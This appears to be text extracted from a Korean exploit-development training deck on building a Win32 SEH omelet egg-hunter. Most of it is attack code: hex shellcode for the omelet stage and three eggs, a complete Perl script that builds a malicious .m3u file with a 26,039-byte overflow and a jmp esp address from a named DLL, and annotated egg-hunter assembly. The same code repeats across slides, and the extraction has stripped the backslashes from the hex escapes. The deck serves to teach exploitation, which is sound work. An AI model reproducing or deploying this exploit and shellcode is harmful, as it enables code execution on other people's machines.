  • 57. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 쉘코드를 에그로 변환 하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55 C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun tingw32 SEH omelet shellcode v0>w32_SEH_omelet.py Syntax: w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes] Where: omelet bin file = The omelet shellcode stage binary code followed by three bytes of the offsets of the "marker bytes", "max index" and "egg size" variables in the code. shellcode bin file = The shellcode binary code you want to have stored in the eggs and reconstructed by the omelet shellcode stage code. output txt file = The file you want the omelet egg-hunt code and the eggs to be written to (in text format). egg size = The size of each egg (legal values: 6-127, default: 127) marker bytes = The value you want to use as a marker to distinguish the eggs from other data in user-land address space (legal values: 0-0xFFFFFF, default value: 0x280876) Convert the shell code to eggs C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun tingw32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode. bin calceggs.txt 127 0xBADA55
  • 58. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 쉘코드를 에그로 변환 하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55 // This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes: omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0C x59xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5A xE8xC7xFFxFFxFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x03x97xEBxDBx31xC0x64xFFx50x08"; // These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode // (you can insert them as many times as you want, as long as each one is // inserted at least once). They are 127 bytes each: egg0 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50x59x49x49x49x49x43x43x43x43x43x43x51x5A x56x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54x41x41x51x32x41x4 2x32x42x42x30x42x42x58x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30x45x50x4Cx4B x47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4F x47x50x43x31x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; egg1 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5A x44x4Dx43x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55x4Bx55x4Cx4Bx51x4F x51x34x45x51x4Ax4Bx42x46x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4B x45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4B x47x36x50x30x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; egg2 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38x4Bx39x4Ax58x4Cx43x49x50x42x4A x50x50x42x48x4Cx30x4Dx5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37x4Bx4Fx4D x37x42x43x45x31x42x4C x42x43x45x50x41x41x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x4 0x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x 40x40x40x40x40x40x40x40";
  • 59. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 쉘코드를 에그로 변환 하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55 omelet_code // This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes: omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0C x59xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5A xE8xC7xFFxFFxFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x03x97xEBxDBx31xC0x64xFFx50x08"; // These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode // (you can insert them as many times as you want, as long as each one is // inserted at least once). They are 127 bytes each: egg0 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50x59x49x49x49x49x43x43x43x43x43x43x51x5A x56x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54x41x41x51x32x41x4 2x32x42x42x30x42x42x58x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30x45x50x4Cx4B x47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4F x47x50x43x31x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; egg1 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5A x44x4Dx43x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55x4Bx55x4Cx4Bx51x4F x51x34x45x51x4Ax4Bx42x46x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4B x45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4B x47x36x50x30x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; egg2 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38x4Bx39x4Ax58x4Cx43x49x50x42x4A x50x50x42x48x4Cx30x4Dx5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37x4Bx4Fx4D x37x42x43x45x31x42x4C x42x43x45x50x41x41x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x4 0x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x 40x40x40x40x40x40x40x40"; egg0 egg1 egg2
  • 60. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) my $file= "OmeletEggHuntingExploit1.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $garbage="This is a bunch of garbage" x 10; my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50". "x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33". "x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42". "x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58". "x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30". "x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45". "x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31". "x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59". "x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43". "x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55". "x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44". "x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C". "x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51". "x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30". "x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38". "x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D". "x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37". "x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40"; open($FILE,">$file"); print $FILE $junk.$eip.$padding.$omelet_code.$garbage.$egg1.$garbage.$egg2.$garbage.$egg3; close($FILE); print "m3u File Created successfullyn";
  • 61. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 접근 위반 발생 (Access violation when reading [00000000]
  • 62. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / shellcode Analysis jump to shell code my $file= "OmeletEggHuntingExploit1.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $garbage="This is a bunch of garbage" x 10; my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50". "x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33". "x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42". "x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58". "x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30". "x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45". "x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31". "x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59". "x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43". "x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55". "x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44". "x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C". "x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51". "x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30". "x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38". "x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D". "x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37". "x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40"; omit…
  • 63. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $garbage="This is a bunch of garbage" x 10; my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50". "x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33". "x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42". "x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58". "x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30". "x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45". "x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31". "x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59". "x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43". "x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55". "x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44". "x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C". "x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51". "x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30". "x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38". "x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D". "x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37". "x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40"; omit… for nop sled omelet code for finding eggs
  • 64. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $garbage="This is a bunch of garbage" x 10; my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $egg1 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50". "x59x49x49x49x49x43x43x43x43x43x43x51x5Ax56x54x58x33". "x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42". "x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58". "x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30". "x45x50x4Cx4Bx47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45". "x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4Fx47x50x43x31". "x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; my $egg2 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59". "x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5Ax44x4Dx43". "x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55". "x4Bx55x4Cx4Bx51x4Fx51x34x45x51x4Ax4Bx42x46x4Cx4Bx44". "x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4C". "x4Cx4Bx45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51". "x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4Bx47x36x50x30". "x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; my $egg3 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38". "x4Bx39x4Ax58x4Cx43x49x50x42x4Ax50x50x42x48x4Cx30x4D". "x5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37". "x4Bx4Fx4Dx37x42x43x45x31x42x4Cx42x43x45x50x41x41x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40". "x40x40x40x40x40x40x40x40x40x40x40"; EDI → 0x00000000 omit… for nop sled omelet code for finding eggs
  • 65. start: XOR EDI, EDI jmp SHORT reset_stack create_SEH_handler: EDI → 0x00000000 PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ Access Violation REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
  • 66. egg1 egg2 egg3 !mona compare "C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHuntingw32 SEH omelet shellcode v0egg1.bin" !mona compare "C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHuntingw32 SEH omelet shellcode v0egg2.bin" !mona compare "C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHuntingw32 SEH omelet shellcode v0egg3.bin"
  • 67. egg1 (0x000FDxxx) egg2 (0x000FDxxx) egg3 (0x000FDxxx)
  • 68. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1 my $omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08"; my $shlEDI = "x66xBFx80x1FxD1xE7xD1xE7xD1xE7xD1xE7xD1xE7". “xD1xE7xD1xE7”; #0x1F80 shift x 7 my $omelet_code = "x90x90xEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08";
  • 69. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1 my $shlEDI = "x66xBFx80x1FxD1xE7xD1xE7xD1xE7xD1xE7xD1xE7". “xD1xE7xD1xE7”; #0x1F80 shift x 7 my $omelet_code = "x90x90xEBx23x51x64x89x20xFCxB0x7AxF2". "xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0Cx59". "xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08". "x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5AxE8xC7xFFxFF". "xFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x06x97xE9xD8". "xFFxFFxFFx31xC0x64xFFx50x08";
  • 71. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1
  • 72. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) w32_SEH_omelet.asm / modified shell code 1
  • 73. start: XOR EDI, EDI jmp SHORT reset_stack create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.
